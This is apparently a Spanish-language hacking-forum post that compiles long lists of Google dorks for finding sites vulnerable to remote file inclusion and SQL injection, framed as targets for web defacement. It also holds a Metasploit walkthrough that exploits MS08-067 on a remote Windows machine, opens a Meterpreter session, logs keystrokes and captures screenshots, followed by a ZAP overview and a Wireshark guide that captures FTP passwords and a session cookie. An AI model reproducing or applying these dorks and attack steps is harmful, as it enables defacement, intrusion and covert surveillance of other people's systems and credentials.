hackw32
Usuario (Guatemala)
Dorks para buscar paginas vulnerables en el defacing web.Dorks RFI (Remote file intrusion)dijo:/modules/coppermine/themes/coppercop/theme.php?THEME_DIR= /modules/coppermine/themes/maze/theme.php?THEME_DIR= /modules/coppermine/themes/default/theme.php?THEME_DIR= /modules/coppermine/include/init.inc.php?CPG_M_DIR= /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path= /components/com_smf/smf.php?mosConfig_absolute_path= /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= /components/com_simpleboard/image_upload.php?sbp= /components/com_simpleboard/file_upload.php?sbp= /components/com_hashcash/server.php?mosConfig_absolute_path= /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path= /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= /components/com_forum/download.php?phpbb_root_path= /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path= /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path= /components/minibb/index.php?absolute_path= /components/com_smf/smf.php?mosConfig_absolute_path= /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path= /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path= /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path= /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path= /components/com_securityimages/configinsert.php?mosConfig_absolute_path= /components/com_securityimages/lang.php?mosConfig_absolute_path= /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= /components/com_galleria/galleria.html.php?mosConfig_absolute_path= /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path= /e107/e107_handlers/secure_img_render.php?p= /modules/My_eGallery/public/inc/?HCL_path= /modules/My_eGallery/public/displayCategory.php?basepath= /modules/My_eGallery/index.php?basepath= /modules/Forums/admin/index.php?phpbb_root_path= /modules/Forums/admin/admin_avatar.php?phpbb_root_path= /modules/Forums/admin/admin_styles.php?phpbb_root_path= /modules/Forums/admin/admin_board.php?phpEx= /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= /modules/mod_mainmenu.php?mosConfig_absolute_path= /modules/agendax/addevent.inc.php?agendax_path= /shoutbox/expanded.php?conf= /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= /modules/newbb_plus/class/forumpollrenderer.php?bbPath= /phpBB/admin/admin_styles.php?mode= /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= /forum/auth/auth.php?phpbb_root_path= /forum/auth/auth_phpbb/phpbb_root_path= /cutenews/comments.php?cutepath= /library/lib.php?root= /impex/ImpExData.php?systempath= /coppermine/thumbnails.php?lang= /gallery/thumbnails.php?lang= /aWebNews/visview.php?path_to_news= /ashnews.php?pathtoashnews= /4images/index.php?template= /galeri/index.php?template= /gallery/index.php?template= /auth/auth.php?phpbb_root_path= /auth/auth_phpbb/phpbb_root_path= /forums/toplist.php?phpbb_root_path= /forum/toplist.php?phpbb_root_path= /admin/config_settings.tpl.php?include_path= /include/common.php?include_path= /event/index.php?page= /forum/index.php?includeFooter= /forums/index.php?includeFooter= /forum/bb_admin.php?includeFooter= /forums/bb_admin.php?includeFooter= /language/lang_english/lang_activity.php?phpbb_root_path= /forum/language/lang_english/lang_activity.php?phpbb_root_path= /blend_data/blend_common.php?phpbb_root_path= /master.php?root_path= /includes/kb_constants.php?module_root_path= /forum/includes/kb_constants.php?module_root_path= /forums/includes/kb_constants.php?module_root_path= /classes/adodbt/sql.php?classes_dir= /modules/mod_calendar.php?absolute_path= /agenda.php3?rootagenda= /agenda2.php3?rootagenda= /sources/lostpw.php?CONFIG= /topsites/sources/lostpw.php?CONFIG= /toplist/sources/lostpw.php?CONFIG= /sources/join.php?CONFIG= /topsites/sources/join.php?CONFIG= /toplist/sources/join.php?CONFIG= /topsite/sources/join.php?CONFIG= /public_includes/pub_popup/popup_finduser.php?vsDragonRootPath= /extras/poll/poll.php?file_newsportal= /calogic/reconfig.php?GLOBALS= /eshow.php?Config_rootdir= /auction/auction_common.php?phpbb_root_path= /calendar/index.php?inc_dir= /modules/TotalCalendar/index.php?inc_dir= /modules/calendar/index.php?inc_dir= /calendar/embed/day.php?path= /ACalendar/embed/day.php?path= /calendar/add_event.php?inc_dir= /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys= /claroline/auth/ldap/authldap.php?includePath= /docebo/modules/credits/help.php?lang= /modules/credits/help.php?lang= /includes/pafiledb_constants.php?module_root_path= /phpBB/includes/pafiledb_constants.php?module_root_path= /pafiledb/includes/pafiledb_constants.php?module_root_path= /auth/auth.php?phpbb_root_path= /auth/auth_phpbb/phpbb_root_path= /apc-aa/cron.php3?GLOBALS[AA_INC_PATH]= /apc-aa/cached.php3?GLOBALS[AA_INC_PATH]= /infusions/last_seen_users_panel/last_seen_users_panel.php?settings= /phpdig/includes/config.php?relative_script_path= /includes/phpdig/includes/config.php?relative_script_path= /includes/dbal.php?eqdkp_root_path= /eqdkp/includes/dbal.php?eqdkp_root_path= /dkp/includes/dbal.php?eqdkp_root_path= /path/include/SQuery/gameSpy2.php?libpath= /include/global.php?GLOBALS= /topsites/config.php?returnpath= /manager/frontinc/prepend.php?_PX_config[manager_path]= /ubbthreads/addpost_newpoll.php?addpoll=thispath= /forum/addpost_newpoll.php?thispath= /forums/addpost_newpoll.php?thispath= /ubbthreads/ubbt.inc.php?thispath= /forums/ubbt.inc.php?thispath= /forum/ubbt.inc.php?thispath= /forum/admin/addentry.php?phpbb_root_path= /admin/addentry.php?phpbb_root_path= /includes/orderSuccess.inc.php?glob= /stats.php?dir=dir= /ladder/stats.php?dir= /ladders/stats.php?dir= /sphider/admin/configset.php?settings_dir= /admin/configset.php?settings_dir= /vwar/admin/admin.php?vwar_root= /modules/vwar/admin/admin.php?vwar_root= /modules/vWar_Account/includes/get_header.php?vwar_root=SQL DORKSdijo:inurl:index.php?id= inurl:trainers.php?id= inurl:"tinymce.xml" inurl:buy.php?category= inurl:article.php?id= inurl:play_old.php?id= inurl:noticias.php?id= inurl:newsitem.php?id= inurl:readnews.php?id= inurl:top10.php?id= inurl:historialeer.php?id= inurl:reagir.php?id= inurl:Stray-Questions-View.php?id= inurl:forum_bds.php?id= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= allinurl: admin mdb.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:postscript.php?p_mode= inurl:index.php?pg= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?id= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl:product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:productos.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail.php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?id= inurl:shop_category.php?id= inurl:transcript.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?id= inurl:review.php?id= inurl:iniziativa.php?id= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?id= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:"id=" & intext:"Warning: mysql_fetch_assoc() inurl:"id=" & intext:"Warning: mysql_fetch_array() inurl:"id=" & intext:"Warning: mysql_num_rows() inurl:"id=" & intext:"Warning: session_start() inurl:"id=" & intext:"Warning: getimagesize() inurl:"id=" & intext:"Warning: is_writable() inurl:"id=" & intext:"Warning: Unknown() inurl:"id=" & intext:"Warning: mysql_result() inurl:"id=" & intext:"Warning: pg_exec() inurl:"id=" & intext:"Warning: mysql_query() inurl:"id=" & intext:"Warning: array_merge() inurl:"id=" & intext:"Warning: preg_match() inurl:"id=" & intext:"Warning: filesize() inurl:"id=" & intext:"Warning: require() inurl:"id=" & intext:"Warning: mysql_free_result() allinurl:.php?id= allinurl:.php?file= allinurl:*.php?file= allinurl:.php?fileid= allinurl:*.php?fileid= allinurl:.php?file_id= allinurl:*.php?file_id= allinurl:.php?page= allinurl:*.php?page= allinurl:.php?pageid= allinurl:*.php?pageid= allinurl:.php?page_id= allinurl:*.php?page_id= allinurl:.php?pagenum= allinurl:*.php?pagenum= allinurl:.php?page_num= allinurl:*.php?page_num= allinurl:.php?cat= allinurl:*.php?cat= allinurl:.php?cat_id= allinurl:*.php?cat_id= allinurl:.php?catid= allinurl:*.php?catid= allinurl:.php?prod= allinurl:*.php?prod= allinurl:.php?prodid= allinurl:*.php?prodid= allinurl:.php?prod_id= allinurl:*.php?prod_id= allinurl:.php?product= allinurl:*.php?product= allinurl:.php?productid= allinurl:*.php?productid= allinurl:.php?product_id= allinurl:*.php?product_id= allinurl:.php?products_id= allinurl:*.php?products_id= allinurl:.php?userid= allinurl:*.php?userid= allinurl:.php?user_id= allinurl:*.php?user_id= allinurl:.php?showuser= allinurl:*.php?showuser= allinurl:.php?show_user= allinurl:*.php?show_user= allinurl:.php?username= allinurl:*.php?username= allinurl:.php?memberid= allinurl:*.php?memberid= allinurl:.php?member_id= allinurl:*.php?member_id= allinurl:.php?membernumber= allinurl:*.php?membernumber= allinurl:.php?member_number= allinurl:*.php?member_number= inurl:declaration_more.php?decl_id= inurl:games.php?id= inurl:newsDetail.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:forum_bds.php?num= inurl:avd_start.php?avd= inurl:roduct-item.php?id= inurl:title.php?id= inurl:art.php?idm= inurl:ffer.php?idf= inurl:rubp.php?idr= inurl:rubrika.php?idr= inurl:newsticker_info.php?idn= inurl:newscat.php?id= inurl:tekst.php?idt= inurl:galeri_info.php?l= inur:opinions.php?id= inurl:material.php?id=ASP DORKSdijo:".asp?bookID=" ".asp?cart=" ".asp?cartID=" ".asp?catalogid=" ".asp?category_list=" ".asp?CategoryID=" ".asp?catID=" ".asp?cid=" ".asp?code_no=" ".asp?code=" ".asp?designer=" ".asp?framecode=" ".asp?id=" ".asp?idcategory=" ".asp?idproduct=" ".asp?intCatalogID=" ".asp?intProdId=" ".asp?item_id=" ".asp?item=" ".asp?itemID=" ".asp?maingroup=" ".asp?misc=" ".asp?newsid=" ".asp?order_id=" ".asp?p=" ".asp?pid=" ".asp?ProdID=" ".asp?product_id=" ".asp?product=" ".asp?productid=" ".asp?showtopic=" ".asp?Sku=" ".asp?storeid=" ".asp?style_id=" ".asp?StyleID=" ".asp?userID=" "about.asp?cartID=" "accinfo.asp?cartId=" "acclogin.asp?cartID=" "add.asp?bookid=" "add_cart.asp?num=" "addcart.asp?" "addItem.asp" "add-to-cart.asp?ID=" "addToCart.asp?idProduct=" "addtomylist.asp?ProdId=" "adminEditProductFields.asp?intProdID=" "advSearch_h.asp?idCategory=" "affiliate.asp?ID=" "affiliate-agreement.cfm?storeid=" "affiliates.asp?id=" "ancillary.asp?ID=" "archive.asp?id=" "article.asp?id=" "aspx?PageID" "basket.asp?id=" "Book.asp?bookID=" "book_list.asp?bookid=" "book_view.asp?bookid=" "BookDetails.asp?ID=" "browse.asp?catid=" "browse_item_details.asp" "Browse_Item_Details.asp?Store_Id=" "buy.asp?" "buy.asp?bookid=" "bycategory.asp?id=" "cardinfo.asp?card=" "cart.asp?action=" "cart.asp?cart_id=" "cart.asp?id=" "cart_additem.asp?id=" "cart_validate.asp?id=" "cartadd.asp?id=" "cat.asp?iCat=" "catalog.asp" "catalog.asp?CatalogID=" "catalog_item.asp?ID=" "catalog_main.asp?catid=" "category.asp" "category.asp?catid=" "category_list.asp?id=" "categorydisplay.asp?catid=" "checkout.asp?cartid=" "checkout.asp?UserID=" "checkout_confirmed.asp?order_id=" "checkout1.asp?cartid=" "comersus_listCategoriesAndProducts.asp?idCategory =" "comersus_optEmailToFriendForm.asp?idProduct=" "comersus_optReviewReadExec.asp?idProduct=" "comersus_viewItem.asp?idProduct=" "comments_form.asp?ID=" "contact.asp?cartId=" "content.asp?id=" "customerService.asp?TextID1=" "default.asp?catID=" "description.asp?bookid=" "details.asp?BookID=" "details.asp?Press_Release_ID=" "details.asp?Product_ID=" "details.asp?Service_ID=" "display_item.asp?id=" "displayproducts.asp" "downloadTrial.asp?intProdID=" "emailproduct.asp?itemid=" "emailToFriend.asp?idProduct=" "events.asp?ID=" "faq.asp?cartID=" "faq_list.asp?id=" "faqs.asp?id=" "feedback.asp?title=" "freedownload.asp?bookid=" "fullDisplay.asp?item=" "getbook.asp?bookid=" "GetItems.asp?itemid=" "giftDetail.asp?id=" "help.asp?CartId=" "home.asp?id=" "index.asp?cart=" "index.asp?cartID=" "index.asp?ID=" "info.asp?ID=" "item.asp?eid=" "item.asp?item_id=" "item.asp?itemid=" "item.asp?model=" "item.asp?prodtype=" "item.asp?shopcd=" "item_details.asp?catid=" "item_list.asp?maingroup" "item_show.asp?code_no=" "itemDesc.asp?CartId=" "itemdetail.asp?item=" "itemdetails.asp?catalogid=" "learnmore.asp?cartID=" "links.asp?catid=" "list.asp?bookid=" "List.asp?CatID=" "listcategoriesandproducts.asp?idCategory=" "modline.asp?id=" "myaccount.asp?catid=" "news.asp?id=" "order.asp?BookID=" "order.asp?id=" "order.asp?item_ID=" "OrderForm.asp?Cart=" "page.asp?PartID=" "payment.asp?CartID=" "pdetail.asp?item_id=" "powersearch.asp?CartId=" "price.asp" "privacy.asp?cartID=" "prodbycat.asp?intCatalogID=" "prodetails.asp?prodid=" "prodlist.asp?catid=" "product.asp?bookID=" "product.asp?intProdID=" "product_info.asp?item_id=" "productDetails.asp?idProduct=" "productDisplay.asp" "productinfo.asp?item=" "productlist.asp?ViewType=Category&CategoryID= " "productpage.asp" "products.asp?ID=" "products.asp?keyword=" "products_category.asp?CategoryID=" "products_detail.asp?CategoryID=" "productsByCategory.asp?intCatalogID=" "prodView.asp?idProduct=" "promo.asp?id=" "promotion.asp?catid=" "pview.asp?Item=" "resellers.asp?idCategory=" "results.asp?cat=" "savecart.asp?CartId=" "search.asp?CartID=" "searchcat.asp?search_id=" "Select_Item.asp?id=" "Services.asp?ID=" "shippinginfo.asp?CartId=" "shop.asp?a=" "shop.asp?action=" "shop.asp?bookid=" "shop.asp?cartID=" "shop_details.asp?prodid=" "shopaddtocart.asp" "shopaddtocart.asp?catalogid=" "shopbasket.asp?bookid=" "shopbycategory.asp?catid=" "shopcart.asp?title=" "shopcreatorder.asp" "shopcurrency.asp?cid=" "shopdc.asp?bookid=" "shopdisplaycategories.asp" "shopdisplayproduct.asp?catalogid=" "shopdisplayproducts.asp" "shopexd.asp" "shopexd.asp?catalogid=" "shopping_basket.asp?cartID=" "shopprojectlogin.asp" "shopquery.asp?catalogid=" "shopremoveitem.asp?cartid=" "shopreviewadd.asp?id=" "shopreviewlist.asp?id=" "ShopSearch.asp?CategoryID=" "shoptellafriend.asp?id=" "shopthanks.asp" "shopwelcome.asp?title=" "show_item.asp?id=" "show_item_details.asp?item_id=" "showbook.asp?bookid=" "showStore.asp?catID=" "shprodde.asp?SKU=" "specials.asp?id=" "store.asp?id=" "store_bycat.asp?id=" "store_listing.asp?id=" "Store_ViewProducts.asp?Cat=" "store-details.asp?id=" "storefront.asp?id=" "storefronts.asp?title=" "storeitem.asp?item=" "StoreRedirect.asp?ID=" "subcategories.asp?id=" "tek9.asp?" "template.asp?Action=Item&pid=" "topic.asp?ID=" "tuangou.asp?bookid=" "type.asp?iType=" "updatebasket.asp?bookid=" "updates.asp?ID=" "view.asp?cid=" "view_cart.asp?title=" "view_detail.asp?ID=" "viewcart.asp?CartId=" "viewCart.asp?userID=" "viewCat_h.asp?idCategory=" "viewevent.asp?EventID=" "viewitem.asp?recor=" "viewPrd.asp?idcategory=" "ViewProduct.asp?misc=" "voteList.asp?item_ID=" "whatsnew.asp?idCategory=" "WsAncillary.asp?ID=" "WsPages.asp?ID="
Una de las muchas herramientas que trae integrada el Metasploit, es un Keylogger. Podemos capturar las teclas presionadas en el P.C Remoto, ademas de poder sacar un Screenshot. Aquí veremos el uso de esté servicio del Metasploit. Primero ingresaremos a la P.C con el exploit: * exploit/windows/smb/ms08_067_netapi y con el PAYLOAD: * windows/shell/bind_tcp * windows/shell/reverse_tcp En este caso usaremos el PAYLOAD windows/shell/bind_tcp __. .__. .__. __. _____ _____/ |______ ____________ | | ____ |__|/ |_ / _/ __ ____ / ___/____ | | / _ | __ | Y Y ___/| | / __ ____ | |_> > |_( <_> ) || | |__|_| /___ >__| (____ /____ >| __/|____/____/|__||__| / / / / |__| =[ metasploit v3.3.2-release [core:3.3 api:1.0] + -- --=[ 462 exploits - 219 auxiliary + -- --=[ 192 payloads - 22 encoders - 8 nops =[ svn r7808 updated 8 days ago (2009.12.10) Warning: This copy of the Metasploit Framework was last updated 8 days ago. We recommend that you update the framework at least every other day. For information on updating your copy of Metasploit, please see: http://dev.metasploit.com/redmine/projects/framework/wiki/Updating msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3 RHOST => 192.168.0.3 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish [*] Selected Target: Windows XP SP2 Spanish (NX) [*] Triggering the vulnerability... [*] Sending stage (723456 bytes) [*] Meterpreter session 1 opened (192.168.0.2:4367 -> 192.168.0.3:4444) meterpreter > Ahora que estamos dentro del P.C remoto, miremos las optiones que tiene, con el comando Help meterpreter > help Core Commands ============= Command Description ------- ----------- ps List running processes migrate Migrate the server to another process use Load a one or more meterpreter extensions Stdapi: User interface Commands =============================== Command Description ------- ----------- keyscan_dump Dump they keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes meterpreter > Es la hora de iniciar nuestro keylogger, pero antes, mirelos los procesos que estan corriendo en la P.C Remota, con el comando ps meterpreter > ps Process list ============ PID Name Path --- ---- ---- 368 smss.exe SystemRootSystem32smss.exe 548 csrss.exe ??C:WINDOWSsystem32csrss.exe 576 winlogon.exe ??C:WINDOWSsystem32winlogon.exe 656 services.exe C:WINDOWSsystem32services.exe 668 lsass.exe C:WINDOWSsystem32lsass.exe 824 svchost.exe C:WINDOWSsystem32svchost.exe 840 cmd.exe C:WINDOWSsystem32cmd.exe 892 svchost.exe C:WINDOWSsystem32svchost.exe 988 svchost.exe C:WINDOWSSystem32svchost.exe 1040 svchost.exe C:WINDOWSsystem32svchost.exe 1128 svchost.exe C:WINDOWSsystem32svchost.exe 1384 wuauclt.exe C:WINDOWSsystem32wuauclt.exe 1452 Explorer.EXE C:WINDOWSExplorer.EXE 1512 spoolsv.exe C:WINDOWSsystem32spoolsv.exe 1684 alg.exe C:WINDOWSSystem32alg.exe 1700 wscntfy.exe C:WINDOWSsystem32wscntfy.exe 1800 ctfmon.exe C:WINDOWSsystem32ctfmon.exe 1908 inetinfo.exe C:WINDOWSsystem32inetsrvinetinfo.exe 1936 metsvc.exe C:WINDOWSTEMPLsMhsBTbmetsvc.exe meterpreter > Ahora migremos al proceso Explorer.exe. Usaremos el comando Migrate [Numero_Proceso] . Miremos el PID del proceso Explorer.exe, es el numero 1452. meterpreter > migrate 1452 [*] Migrating to 1452... [*] Migration completed successfully. meterpreter > Ya es hora de que iniciaremos el Keylogger con el comando keyscan_start meterpreter > keyscan_start Starting the keystroke sniffer... meterpreter > Ahora con ayuda del comando keyscan_dump , veremos las teclas presionadas en la P.C Remota. meterpreter > keyscan_dump Dumping captured keystrokes... net user <Return> <Ctrl> <LCtrl> <Alt> <LMenu> meterpreter > Ahora miremos la opción de sacar un ScreenShot de la P.C Remota, para ello usaremos el plugin espia del metasploit. meterpreter > use espia Loading extension espia...success. meterpreter > Despues con el comando screenshot [Ruta_Archivo_Salida] sacaremos una captura de pantalla de la P.C Remota. meterpreter > screenshot /Prueba.bmp [*] Image saved to /Prueba.bmp meterpreter > Con esto damos por concluida el uso del Keylogger y lo pausamos con el comando keyscan_stop meterpreter > keyscan_stop Stopping the keystroke sniffer... meterpreter > By: Shell Root Video: link: http://www.youtube.com/watch?v=f8_M6V3xILE
Zed Attack Proxy (ZAP) es una herramienta de penetration test para la búsqueda de vulnerabilidades en aplicaciones web. Está diseñada para ser utilizado por personas con una amplia gama de experiencia en seguridad y útil para desarrolladores. ZAP ofrece escáneres automáticos, así como un conjunto de herramientas que le permiten encontrar las vulnerabilidades de seguridad de forma manual. https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project Características Genera reportes de alertas seleccionadas. Genera un reporte general de todas las alertas. Formato de exportación PDF o ODT. Permite adjuntar un documento que se agrega antes del reporte generado. Personalización de datos del reporte, como Nombre del Cliente, Autor del documento, Nombre de la empresa, etc. Genera los pasos para reproducir cada alerta con el detalle de cada paso y su imagen. Previamente completando los datos en los detalles de la alerta y configurando el directorio de imágenes.
Introducción. Wireshark es un analizador de paquetes de red, comúnmente llamado sniffer. Es utilizado por administradores de redes para ver todo el tráfico que está pasando en un momento específico. Una de las ventajas que tiene, es que es open source y multiplataforma. Wireshark ofrece distintos tipos de filtros para leer los paquetes. Captura a demás cookies y passwords que veremos a continuación en este paper. Para instalar wireshark simplemente hay que ir a su página oficial y descargarlo. http://www.wireshark.org/download.html Desde linux, se puede descargar desde la consola. Sudo apt-get install wireshark Partes de Wireshark Enumere las partes más importantes del Wireshark para describirlas por separado. 1 – Muestra un listado de las interfaces disponibles que podemos poner a la escucha de paquetes. 2 – Permite configurar algunos parámetros de nuestra interface 3 – El filtro permite filtras paquetes separándolos por IP, protocolos, etc 4 – Listado de paquetes. Muestra un resumen de los paquetes capturados, presionando con el otro botón del mouse se listaran opciones disponibles para manejarlos a gusto. 5 – Panel de vista en Árbol. Muestra el paquete seleccionado con mayor detalle. 6 – Panel de detalle de los datos. Muestra los datos del panel superior en formato hexadecimal y ascii También podemos ver en el menú superior las siguientes opciones: File: Contiene las funciones para manipular archivos y para cerrar la aplicación Wireshark. Edit: Este se puede aplicar funciones a los paquetes, por ejemplo, buscar un paquetes especifico, aplicar una marca al paquete y configurar la interfaz de usuario. View: Permite configurar el despliegue del paquete capturado. Go: Desde acá podemos ir a un paquete especifico, volver atrás, adelante, etc. Capture: Para iniciar y detener la captura de paquetes. Analyze: Desde analyze podemos manipular los filtros, habilitar o deshabilitar protocolos, flujos de paquetes, etc. Statistics: Podemos definir u obtener las estadísticas del trafico capturado. Telephony: Trae herramientas para telefonía. Tools: Opciones para el firewall Internal: Parámetros internos de Wireshark Help: Menú de ayuda. Primeros pasos con Wireshark Una vez instalado, lo abrimos y presionamos sobre el icono marcado en rojo en la imagen Esto nos permitirá seleccionar nuestra tarjeta de red que pondremos a la escucha de paquetes. Para saber que tarjeta poner a la escucha, debemos observar cual es la que recibe paquetes. Se puede observar en la imagen que en mi caso es la wlan0. Una vez identificada, damos en Start para comenzar. Automáticamente el programa comenzara a capturar paquetes de todos los hosts conectados a la red. Ahora navegare un poco con mis ordenadores por internet para ver que podemos capturar. Les mostrare un ejemplo de cómo se manifestó wireshark cuando se hace un apt-get install en una consola de Linux Ahí podemos ver de que ip a que ip se mueven los paquetes y porque protocolo. A demás de esto podemos ver el contenido del paquete que lo veremos más adelante en este mismo paper. Si observamos la imagen, hay una caja de texto llamada Filter. Esa caja de texto, como bien dice su nombre, permite filtrar paquetes. Y ahora veremos algunos de los filtros que posee Wireshark para que podamos usar este sniffer de una forma más eficiente. En el filtro se pueden usar operadores lógicos como los siguientes: == (Igual que) > (Mayor que) < (Menor que) != (Distinto que) >= (Mayor o igual que) <= (Menor o igual que) Basándome en el paper de Datasecurity, les dejo a continuación los parámetros más usados en este sniffer Filtros por IP [En todos los ejemplos, reemplazar 0.0.0.0 por la ip a filtrar] ip.addr = = 0.0.0.0ip.addr = = 0.0.0.0 && ip.addr = = 0.0.0.0 (Para filtrar más de una IP ) ip.addr = = 0.0.0.0 || ip.addr = = 0.0.0.0 (Para filtrar una IP de cualquiera de las dos) Para filtrar paquetes de la fuente en direcciones IPv4 especificas: ip.src == 0.0.0.0ip.src == 0.0.0.0 && ip.src == 0.0.0.0 (Para filtrar más de una IP ) ip.src == 0.0.0.0 || ip.src == 0.0.0.0 (Para filtrar una IP de cualquiera de las dos) Para filtrar paquetes del destino en direcciones IPv4 especificas: ip.dst == 0.0.0.0ip.dst == 0.0.0.0 && ip.dst == 0.0.0.0 (Para filtrar más de una IP ) ip.dst == 0.0.0.0 || ip.dst == 0.0.0.0 (Para filtrar una IP de cualquiera de las dos) Nota: Para direcciones IP v6 utilice: ipv6.addr, ipv6.src, ipv6.dst, etc. Para filtrar paquetes del protocolo ARP entre: arp.src.proto (dirección del protocolo de la fuente) arp.src.hw (dirección hardware de la fuente) arp.dst.hw (dirección hardware del destino) arp.src.hw_mac (dirección MAC de la fuente) arp.dst.hw_mac (dirección MAC del destino) arp.src.proto_ipv4 (dirección IPv4 de la fuente ) arp.dst.proto_ipv4 (dirección IPv4 del destino) Para filtrar paquetes del protocolo Ethernet: eth.dst == ff:ff:ff:ff:ff:ff (dirección MAC) eth.src == ff:ff:ff:ff:ff:ff (dirección MAC) eth.addr == ff:ff:ff:ff:ff:ff (dirección MAC) Veremos un ejemplo con uno de los filtros: ip.addr == 192.168.1.37 En este caso me debería mostrar los paquetes correspondientes a la ip 192.168.1.37 Se puede ver en verde también 192.168.1.1 y esto es porque hace petición al router. Filtro por protocolo Como vimos hasta ahora, este filtro es muy poderoso, pero se darán cuenta de su potencial ahora que filtraremos por protocolo. Algunos de los filtros son estos: tcp, http, pop, dns, arp, ssl, etc. Con un Sniffer podemos obtener datos muy importantes. Desde cookies hasta usuarios y contraseñas. A modo ejemplo, abriré un FTP y veremos lo que hace nuestro Wireshark: http://2.bp.blogspot.com/-m_S-q_Xftgs/TxR3n4IvA2I/AAAAAAAABGY/4dkpuXLQoI0/s1600/8.png Como se puede ver, solo filtre el protocolo FTP. Y tambien notaremos que sacó mi user y pass del FTP. Veremos ahora otros de los protocolos que suele capturar. http://1.bp.blogspot.com/-1zkuqbUt7Ds/TxR3loKd_AI/AAAAAAAABGQ/9L3N8izXHwg/s1600/9.png La imagen muestra el protocolo DNS e ICMP. Que si los añadimos en la caja de texto de filtro, nos los filtrara. Aquí tenemos filtro por DNS Cabe aclarar que cada protocolo tiene un color diferente (que puede modificarse a gusto) para resaltarlos y distinguirlos con mayor facilidad. Otros filtros Veremos ahora otros filtros de gran utilidad, como este otro que nos permite filtrar por dominio o host http.host == “DOMINIO” Acá lo que hice fue poner la url de facebook y robo mi cookie. Veremos ahora un ejemplo con otra web, pero filtrando nada más que el protocolo TCP: Se puede ver de qué ip privada navego hacia que ip publica. En este caso, la ip pública es la del foro infiernohacker y abajo muestra la url de referencia. Otras opciones de Wireshark Veremos ahora algo que se llama Go to Packet o ir al paquete. Para usar esta opción basta con ir a GO >> Go to Packet en el menú de la barra superior. Permite ir a un número de paquete que especifiquemos en el cuadro de texto. Otras de las opciones muy útiles que tiene Wireshark es la de poder mostrar en formato ascii la lectura de los paquetes capturados para poder así facilitar su entendimiento Para ir a esta opción colocamos en el filtro HTTP y solo basta con clickear con el botón secundario del mouse y seleccionar Follow TCP Stream Como se puede ver, se ve mucho más entendible el código y permite tambien pasarlo a Hexadecimal, C Array etc. Espero que les haya sido de utilidad Autor: ANTRAX
